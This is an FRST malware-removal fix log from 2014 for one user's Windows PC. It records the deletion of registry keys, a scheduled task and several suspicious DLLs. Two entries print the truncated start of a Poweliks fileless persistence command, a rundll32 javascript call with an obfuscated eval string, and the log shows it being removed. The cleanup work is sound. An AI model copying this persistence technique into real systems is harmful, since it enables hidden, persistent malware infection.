Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 26-10-2014
Ran by Jeremy at 2014-10-26 16:57:28 Run:1
Running from C:\Users\Jeremy\Desktop
Loaded Profile: Jeremy (Available profiles: Jeremy)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
start
HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\ScCertProp: wlnotify.dll [X]
HKU\S-1-5-21-2021864660-184726159-3145544098-1000\...\MountPoints2: {abafe4c4-4917-11e4-a441-806e6f6e6963} - D:\DWA140.EXE
HKU\S-1-5-21-2021864660-184726159-3145544098-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} download.eset.com/special/eos/OnlineScanner.cab
2014-10-25 19:26 - 2014-10-25 19:26 - 00000000 _____ () C:\Windows\system32\hozek.dll
2014-10-25 19:25 - 2014-10-25 19:25 - 00070656 _____ () C:\Windows\system32\ymkhh.dll
2014-10-25 19:25 - 2014-10-25 19:25 - 00029184 _____ () C:\Users\Jeremy\AppData\Roaming\xitus.dll
C:\Users\Jeremy\AppData\Local\Temp\Quarantine.exe
C:\Users\Jeremy\AppData\Local\Temp\sqlite3.dll
CustomCLSID: HKU\S-1-5-21-2021864660-184726159-3145544098-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Task: {8F068C8D-F941-4F7C-AF2A-3EC890FAAD4E} - System32\Tasks\{5AD3E9FF-D154-89FB-EF82-0F3E260DFDC4} => C:\Windows\system32\ymkhh.dll [2014-10-25] ()
end
*****************
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp" => Key deleted successfully.
"HKU\S-1-5-21-2021864660-184726159-3145544098-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{abafe4c4-4917-11e4-a441-806e6f6e6963}" => Key deleted successfully.
"HKCR\CLSID\{abafe4c4-4917-11e4-a441-806e6f6e6963}" => Key not found.
"HKU\S-1-5-21-2021864660-184726159-3145544098-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-2021864660-184726159-3145544098-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{7530BFB8-7293-4D34-9923-61A11451AFC5}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{7530BFB8-7293-4D34-9923-61A11451AFC5}" => Key not found.
Could not move "C:\Windows\system32\hozek.dll" => Scheduled to move on reboot.
C:\Windows\system32\ymkhh.dll => Moved successfully.
C:\Users\Jeremy\AppData\Roaming\xitus.dll => Moved successfully.
C:\Users\Jeremy\AppData\Local\Temp\Quarantine.exe => Moved successfully.
C:\Users\Jeremy\AppData\Local\Temp\sqlite3.dll => Moved successfully.
"HKU\S-1-5-21-2021864660-184726159-3145544098-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8F068C8D-F941-4F7C-AF2A-3EC890FAAD4E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8F068C8D-F941-4F7C-AF2A-3EC890FAAD4E}" => Key deleted successfully.
C:\Windows\System32\Tasks\{5AD3E9FF-D154-89FB-EF82-0F3E260DFDC4} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{5AD3E9FF-D154-89FB-EF82-0F3E260DFDC4}" => Key deleted successfully.
=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-10-26 16:58:52)<=
C:\Windows\system32\hozek.dll => Is moved successfully.
==== End of Fixlog ====